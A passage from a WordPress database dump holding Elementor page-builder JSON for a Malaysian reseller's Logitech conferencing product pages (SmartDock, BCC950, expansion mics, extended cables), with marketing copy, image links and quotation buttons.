Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6082,3041,'_elementor_version','0.4'),(6086,3042,'_elementor_template_type','post'),(6087,3042,'_elementor_data','[{\"id\":\"e24bb76\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"49cb1ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"22c9bdb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK<\\/h2><p>Secure meeting room console designed for Skype Room Systems<\\/p><ul><li>Securely mount Surface\\u2122 Pro in any conference room<\\/li><li>Start your Skype for Business meeting with one-touch join<\\/li><li>Add connectivity without clutter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bc9889\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6b5486\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.png\",\"id\":3033}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5300311\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"185d208\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12eaaab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK MAKES SKYPE ROOMS EASY<\\/h2><p>Add video collaboration to any room with Logitech\\u00ae SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed Windows\\u00ae 10 Skype meeting app.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f09081\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1222d0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"868fa53\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c500ae9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"30eb069\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b14b9de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c996fe6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/EqZbHTEVfvA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"cdc9177\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"333fa79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SKYPE FOR BUSINESS<\\/h3><p>Logitech SmartDock meeting room solution, designed for Microsoft Skype\\u00ae for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc04271\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1c378bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a4beb86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURELY LOCKS SURFACE PRO<\\/h3><p>SmartDock is an AV control console and powered mount with Kensington\\u00ae security slot for added protection. Confidently leave a Surface\\u00ae Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6b27b08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3bfea6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock.jpg\",\"id\":3034}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458aa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4d634bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a9587d9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.jpg\",\"id\":3035}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2644878\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"88f77cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADDS CONNECTIVITY WITHOUT CLUTTER<\\/h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1e3e62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9afb26a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"afc2bb6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SIMPLIFIES CONTENT SHARING<\\/h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4df46a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dcde8ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-2.jpg\",\"id\":3036}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"705260b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ece995b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2a41a9a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-3.jpg\",\"id\":3037}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0ed16d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"8d03f27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPLETE THE EXPERIENCE<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e3a52b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cdc1fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"145cf08\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b612093\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"491e24c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"67df618\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4f33f87\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM<\\/h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5358850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65020ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXTENDED I\\/O FOR SURFACE PRO<\\/h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1283944\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bbe9fd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ENERGY-SAVING HIBERNATION<\\/h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ad2c4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7a14c34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT<\\/h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cebd381\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"498ce51\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"64b49a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SUPERIOR CABLE MANAGEMENT<\\/h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7bd1a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a733024\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY ACCESS TO ROOM AV<\\/h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the room\\u2019s camera, speakerphone, and display accessible to a user\\u2019s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40d4a0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"80afd57\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1d76971\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45e4d43\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6088,3042,'_elementor_version','0.4'),(6090,3043,'_wp_page_template','template-fullwidth.php'),(6091,3043,'_elementor_edit_mode','builder'),(6092,3043,'_elementor_template_type','post'),(6093,3043,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>BCC950<\\/h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6094,3043,'_elementor_version','0.4'),(6098,3044,'_elementor_template_type','post'),(6099,3044,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>BCC950<\\/h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY 